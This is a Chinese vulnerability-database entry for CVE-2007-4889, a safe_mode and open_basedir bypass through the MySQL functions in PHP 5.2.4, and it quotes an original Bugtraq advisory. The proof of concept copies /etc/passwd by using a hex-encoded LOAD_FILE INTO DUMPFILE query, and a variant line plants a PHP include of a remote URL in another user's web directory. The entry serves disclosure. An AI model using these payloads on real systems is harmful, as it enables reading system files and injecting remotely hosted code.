PHP MySQL 扩展件多个安全绕过漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1189148 漏洞类型 未知
发布时间 2007-09-13 更新时间 2007-09-13
CVE编号 CVE-2007-4889 CNNVD-ID CNNVD-200709-170
漏洞平台 N/A CVSS评分 6.8
|漏洞来源
https://www.securityfocus.com/bid/85409
https://cxsecurity.com/issue/WLB-2007090051
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200709-170
|漏洞详情
PHP中的MySQL扩展允许远程攻击者可以借助MySQL(1)LOAD_FILE,(2)INTODUMPFILE,以及(3)INTOOUTFILE函数绕过安全模式和打开文件基础目录(open_basedir)限制。
|漏洞EXP
Application: PHP <=5.2.4
Web Site: http://php.net
Platform: unix
Bug: safemode & open_basedir bypass

-------------------------------------------------------

1) Introduction
2) Bug
3) Proof of concept
4) Credits
===========
1) Introduction
===========

"PHP is a widely-used general-purpose scripting language that
is especially suited for Web development and can be embedded into HTML."

======
2) Bug
======
various mysql functions safemode & open_basedir bypass
( LOAD_FILE , INTO DUMPFILE , INTO OUTFILE )
=====
3)Proof of concept
=====
/*
debian:~# php -v
PHP 5.2.4 (cli) (built: Aug 31 2007 16:39:15)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
*/

debian:/test/mysql# ls
debian:/test/mysql#

<?php
mysql_connect("localhost", "granted_user","something");
mysql_query("select load_file(0x2F6574632F706173737764)into dumpfile'/test/123.txt';");
?>

debian:/test/mysql# ls
123.txt
debian:/test/mysql#
debian:/test/mysql# vim 123.txt
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync

variant : select '<?include("http://site.com/hello.html")?>' into dumpfile '/home/NOT_MY_USER/www/index1.php';

=====
4)Credits & greets
=====

laurent gaffi
laurent.gaffi@gmail.com

greets: Mattias Bengtsson (see http://php.net).
|受影响的产品
PHP PHP 5.2.4
|参考资料

来源:BUGTRAQ
名称:20070911PHP5.2.4<=variousmysqlfunctionssafemode&open_basedirbypass
链接:http://www.securityfocus.com/archive/1/archive/1/479082/100/0/threaded
来源:XF
名称:php-multiple-functions-security-bypass(36555)
链接:http://xforce.iss.net/xforce/xfdb/36555
来源:BUGTRAQ
名称:20070912ReRe:PHP5.2.4<=variousmysqlfunctionssafemode&open_basedirbypass
链接:http://www.securityfocus.com/archive/1/archive/1/479189/100/200/threaded
来源:BUGTRAQ
名称:20070912Re:PHP5.2.4<=variousmysqlfunctionssafemode&open_basedirbypass
链接:http://www.securityfocus.com/archive/1/archive/1/479187/100/200/threaded
来源:SREASON
名称:3134
链接:http://securityreason.com/securityalert/3134